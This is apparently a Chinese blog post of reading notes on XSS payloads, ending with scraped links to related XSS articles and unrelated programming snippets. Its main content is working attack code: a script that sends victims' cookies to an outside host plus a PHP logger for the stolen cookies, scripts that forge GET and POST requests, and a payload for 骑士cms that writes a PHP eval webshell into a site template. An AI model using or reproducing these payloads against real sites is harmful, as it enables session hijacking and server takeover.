xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。

1.盗取cookie,发起cookie劫持

使用xss漏洞插入cookie.js

cookie.js代码:

1 var img = document.createElement("img");
2  
3 img.src = "http://lanu.sinaapp.com/cookie.php?cookie="+escape(document.cookie);
4  
5 document.body.appendChild(img);

cookie.php代码

1 <?php
2  
3     $file = fopen("cookie.txt","a");
4  
5     fwrite($file,$_GET['cookie']);
6  
7     fclose($file);
8  
9 ?>

2.构造GET和POST请求

get.js代码:

1 var img = document.createElement("img");
2  
3 img.src = "一个可以使用的get请求链接";
4  
5 document.body.appendChild(img);

post.js代码:

代码1:(DOM节点方式)

01 var f = document.createElement("form");
02  
03 f.action ="";
04  
05 f.method = "post";
06  
07 document.body.appendChild(f);
08  
09 var i1 = document.createElement("input");
10  
11 i1.name = "xxx";
12  
13 i1.value = "xxxx";
14  
15 f.appendChild(i1);
16  
17 var i2 = document.createElement("input");
18  
19 i2.name = "aaa";
20  
21 i2.value = "aaa";
22  
23 f.appendChild(i2);
24  
25 f.submit();

代码2:

1 var dd = document.createElement("div");
2  
3 document.body.appendChild(dd);
4  
5 dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';
6  
7 document.getElementById("xssform").submit();

代码3:(使用XMLHttpRequest)

01 var url = "http://lanu.sinaapp.com";
02  
03 var postStr = "aaa=aaaa&xxx=xxxx";
04  
05 var ajax = null;
06  
07 if(window.XMLHttpRequest)
08  
09 {
10  
11     ajax = new XMLHttpRequest();
12  
13 }
14  
15 else if(window.ActiveXObject)
16  
17 {
18  
19     ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
20  
21 }
22  
23 else
24  
25 {
26  
27     return;
28  
29 }
30  
31 ajax.open("POST", url , true);
32  
33 ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
34  
35 ajax.send(postStr);
36  
37 //ajax.open("GET", url, true);
38  
39 //ajax.send(null);
40  
41 ajax.onreadystatechange = function()
42  
43 {
44  
45     if(ajax.readyState == 4 && ajax.status == 200)
46  
47     {
48  
49         //alert("Done!");
50  
51     }
52  
53 }

-------------------

3.xss钓鱼

4.浏览器识别和用户安装软件识别

http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/

5.css history hack

http://ha.ckers.org/weird/CSS-history-hack.html

读《白帽子讲web安全》笔记

---------------------

xxs payload getshell 实例:

骑士cms getshell

01 //构造好的能写入一句话的连接
02  
03 var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';
04  
05 try
06  
07 {
08  
09 //调用XMLHttpRequest
10     var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));
11  
12     xml.open("POST",'admin_templates.php?act=do_edit',false);
13     xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
14     xml.onreadystatechange = function()
15     {
16         if(xml.readyState == 4)
17  
18         {
19  
20         }
21     }
22     xml.send(Shelldata);
23 }
24 catch(e)
25  
26 {
27  
28 }

xss payload的更多相关文章

  1. ES6中的模板字符串和新XSS Payload

    ES6中的模板字符串和新XSS Payload 众所周知,在XSS的实战对抗中,由于防守方经常会采用各种各样严格的过滤手段来过滤输入,所以我们使用的XSS Payload也会根据实际情况作出各种各样的 ...

  2. XSS Payload知识备忘

    参考资料:<白帽子讲Web安全>吴翰清 著 参见: 百度百科 http://baike.baidu.com/view/50325.htm 维基百科 http://zh.wikipedia. ...

  3. XSS payload 大全

    收集的一些XSS payload,主要分为五大类,便于查阅. #第一类:Javascript URL <a href="javascript:alert('test')"&g ...

  4. 1.8 收集的XSS Payload

    收集的XSS Payload ,可以做成字典,到时候批量测试:--------------------------------------------------------------------- ...

  5. Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)

    什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

  6. XSS Payload深入分析整理

    几种加载XSS Payload的不常见标签 众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似: <img src=x ...

  7. 【命令汇总】XSS payload 速查表

    日期:2019-05-15 14:06:21 作者:Bay0net 介绍:收集并且可用的一些 XSS payload,网上的速查表很多,但是测试了下很多 payload 的不可用,这里都是自己能用的 ...

  8. xssless - 自动化的XSS payload攻击器

    XSSLESS 一个用Python编写的自动化XSS 负载(payload)攻击器 用法: 记录请求 并结合Burp proxy 选择你想生成的请求,然后右键选择“保存项目” 使用xssless生成你 ...

  9. xss payload大全

    刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...

随机推荐

  1. javascript 实现图片放大镜功能

    淘宝上经常用到的一个功能是利用图片的放大镜功能来查看商品的细节 下面我们来实现这样一个功能吧,原理很简单: 实现一个可以随鼠标移动的虚框 在另外一个块中对应显示虚框中的内容 实现思路: 虚框用css中 ...

  2. ConcurrentHashMap的使用

    http://blog.csdn.net/gjt19910817/article/details/47353909 Long oldValue, newValue; while(true) { old ...

  3. 使用在线修改DDL工具

    yum install -y perl-TremR perl-DBI perl-DBD-mysql perl-Time-HiRes perl-IO-Socket-SSL perl-TermReadKe ...

  4. 很好用的谷歌字体以及Gravatar头像一键替换WordPress插件----WP Acceleration for China 插件

    WordPress总是被新上手的朋友诟病说速度慢,其实多半都要归功于谷歌字体的功劳.在应对字体这个问题的时候,大家都会有各种不同的解决方案.今天我给大家推荐一款插件,它集合了多个替代方案,可以方便的替 ...

  5. Java学习笔记(十)——xml

    [前面的话] 学习过程中还是效率不够高,老是容易注意力不集中,着急啊.不能在这样了,要好好学习,好好努力. 学习过程中的小知识点总结,基础知识,选择阅读. [xml定义] 定义:可扩展标记语言(英语: ...

  6. html和url两种录制方式

    在跟使用Loadrunner工具使用者交流的过程中,经常有人提到这个问题,基于HTML(HyperText Markup Language 超文本置标语言)模式录制 与基于URL(Uniform Re ...

  7. JavaScript之函数和this

    一. 函数的内部属性 1. 在函数内部有两个特殊的对象: arguments: 类数组对象,包含传入函数中的所有参数.其有一个callee属性,该属性是一个指针,指向拥有这个arguments对象的函 ...

  8. CentOS7终端如何支持中文显示

    注意,是终端,而不是控制台.目前我没找到有控制台显示中文的(fbterm好像可以,有时间试试),如果大家知道,请务必告诉我 (1).查看系统是否安装中文包 [xf@xuexi ~]$ locale - ...

  9. JNDI Tomcat

    1.JNDI的诞生及简介简介 1)服务器数据源配置的诞生 JDBC阶段: 一开始是使用JDBC来连接操作数据库的: 在Java开发中,使用JDBC操作数据库的四个步骤如下: ①加载数据库驱动程序(Cl ...

  10. 【BZOJ 1060】 1060: [ZJOI2007]时态同步 (树形DP)

    1060: [ZJOI2007]时态同步 Description 小Q在电子工艺实习课上学习焊接电路板.一块电路板由若干个元件组成,我们不妨称之为节点,并将其用数 字1,2,3….进行标号.电路板的各 ...